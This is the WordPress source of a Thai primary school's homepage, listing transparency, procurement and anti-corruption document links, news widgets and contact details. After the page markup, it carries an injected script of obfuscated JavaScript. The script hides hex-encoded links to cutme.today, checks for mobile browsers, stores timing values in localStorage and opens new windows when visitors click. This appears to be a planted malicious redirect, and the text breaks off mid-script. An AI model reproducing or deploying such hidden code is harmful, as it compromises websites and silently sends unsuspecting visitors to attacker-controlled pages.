900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#00000000\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleWeight\":\"500\",\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#eee9da\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#32e6a4\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 